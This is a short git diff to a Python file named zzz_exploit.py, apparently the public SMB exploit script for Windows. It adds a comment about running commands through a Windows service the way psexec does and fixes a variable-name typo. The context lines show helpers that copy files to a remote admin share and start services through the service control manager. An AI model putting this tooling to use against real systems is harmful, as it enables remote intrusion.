diff --git a/zzz_exploit.py b/zzz_exploit.py
index 695df6a..416a6e3 100644
--- a/zzz_exploit.py
+++ b/zzz_exploit.py
@@ -907,6 +907,7 @@ def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
 		smbConn.putFile(remoteDrive + '$', remotePath, fp.read)
 
 # based on impacket/examples/serviceinstall.py
+# Note: using Windows Service to execute command same as how psexec works
 def service_exec(conn, cmd):
 	import random
 	import string
@@ -918,7 +919,7 @@ def service_exec(conn, cmd):
 	rpcsvc = conn.get_dce_rpc('svcctl')
 	rpcsvc.connect()
 	rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
-	svnHandle = None
+	svcHandle = None
 	try:
 		print("Opening SVCManager on %s....." % conn.get_remote_host())
 		resp = scmr.hROpenSCManagerW(rpcsvc)